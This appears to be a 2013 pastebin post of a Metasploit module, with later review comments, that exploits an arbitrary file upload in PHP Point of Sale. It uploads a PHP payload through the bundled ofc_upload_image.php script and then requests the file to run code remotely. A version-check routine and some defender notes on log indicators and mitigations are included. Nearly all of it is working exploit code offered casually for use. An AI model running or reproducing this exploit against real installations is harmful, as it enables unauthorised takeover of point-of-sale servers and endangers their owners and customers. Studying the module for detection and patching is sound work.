BIe

tes -_-

BIe
Oct 21st, 2013
  1. require 'msf/core'
  2.  
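class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Versions strictly newer than this are reported as Safe by +check+.
  # NOTE(review): the referenced advisory title names 10.x-12.x as affected,
  # which does not obviously agree with this cut-off — confirm before
  # trusting a Safe verdict from +check+.
  SAFE_ABOVE_VERSION = Gem::Version.new('11.3')

  # Module metadata and options. TARGETURI is the base path of the
  # application, defaulting to '/'.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Php Point of Sale Remote Code Execution",
      'Description'    => %q{
just for iseng :D
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Gabby', # Vulnerability Discovery, Module Auth
        ],
      'References'      =>
        [
          [ 'URL', 'http://packetstormsecurity.com/files/123661/PHP-Point-Of-Sale-10.x-11.x-12.x-Remote-Code-Execution.html' ]
        ],
      'Platform'        => ['php'],
      'Arch'            => ARCH_PHP,
      'Targets'         =>
        [
          ['PHP Point Of Sale', {}]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => "18 Oct 2013",
      'DefaultTarget'   => 0))

    register_options(
      [
       OptString.new('TARGETURI', [true, 'The base path to the PHP Point Of Sale application', '/'])
      ], self.class)
  end

  # Base path of the application as configured through TARGETURI.
  #
  # @return [String]
  def uri
    target_uri.path
  end

  # Fingerprints the install from the "PHP Point Of Sale version X.Y" banner
  # on the landing page and compares the version numerically.
  #
  # The original compared version strings lexically, so "11.10" sorted below
  # "11.3" and any "9.x" sorted above it, inverting the verdict for those
  # releases. Gem::Version compares component-wise.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no banner is found,
  #   otherwise Safe or Vulnerable relative to SAFE_ABOVE_VERSION
  def check
    peer = "#{rhost}:#{rport}"

    print_status("#{peer} - Trying to detect installed version")

    res = send_request_cgi({
     'method' => 'GET',
     'uri'    => normalize_uri(uri, "")
    })

    # Anything other than a 200 carrying the banner gives no verdict at all.
    banner = res && res.code == 200 && res.body.match(/PHP Point Of Sale version (\d+\.\d+)/)
    return Exploit::CheckCode::Unknown unless banner

    version = banner[1]
    print_status("#{peer} - Version #{version} detected")

    if Gem::Version.new(version) > SAFE_ABOVE_VERSION
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Vulnerable
    end
  end

  # Drops the PHP payload through the bundled Open Flash Chart upload helper
  # and then requests it so the web server executes it.
  #
  # Defender notes: the first request is a POST to
  # application/libraries/ofc-library/ofc_upload_image.php with a `name`
  # query parameter ending in ".php" and a text/plain body — that combination
  # in access logs is the indicator of this technique. The module depends on
  # that script being reachable and on PHP executing out of
  # application/libraries/tmp-upload-images/, so removing the helper and
  # denying script execution in that directory each break it.
  def exploit
    peer = "#{rhost}:#{rport}"
    payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php"

    print_status("#{peer} - Uploading payload [ #{payload_name} ]")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, "application", "libraries", "ofc-library", "ofc_upload_image.php"),
      'headers'  => { 'Content-Type' => 'text/plain' },
      'vars_get' => { 'name' => payload_name },
      'data'  => payload.encoded
    })

    # Success is a 200 whose body echoes "Saving your image to:
    # ../tmp-upload-images/<name>". A body mentioning HTTP_RAW_POST_DATA is
    # treated as failure (presumably the script emitting a PHP notice instead
    # of saving — confirm). Failure::None was a mis-categorisation for an
    # actual failure; UnexpectedReply is what happened.
    if !res || res.code != 200 || res.body !~ /Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/ || res.body =~ /HTTP_RAW_POST_DATA/
      fail_with(Failure::UnexpectedReply, "#{peer} - File gak keaplut, :3 aborting!")
    end

    # NOTE(review): only the bare file name is registered; whether cleanup
    # resolves it relative to tmp-upload-images/ depends on the payload's
    # working directory — confirm, otherwise the dropped file is left behind.
    register_files_for_cleanup(payload_name)

    print_status("#{peer} - Executing Payload [ #{uri}/application/libraries/tmp-upload-images/#{payload_name} ]" )
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "application", "libraries", "tmp-upload-images", payload_name)
    })

    # No response at all is as much a failure signal as a non-200; the
    # original stayed silent when res was nil.
    unless res && res.code == 200
      print_error("#{peer} - Unexpected response, probably the exploit failed")
    end
  end

end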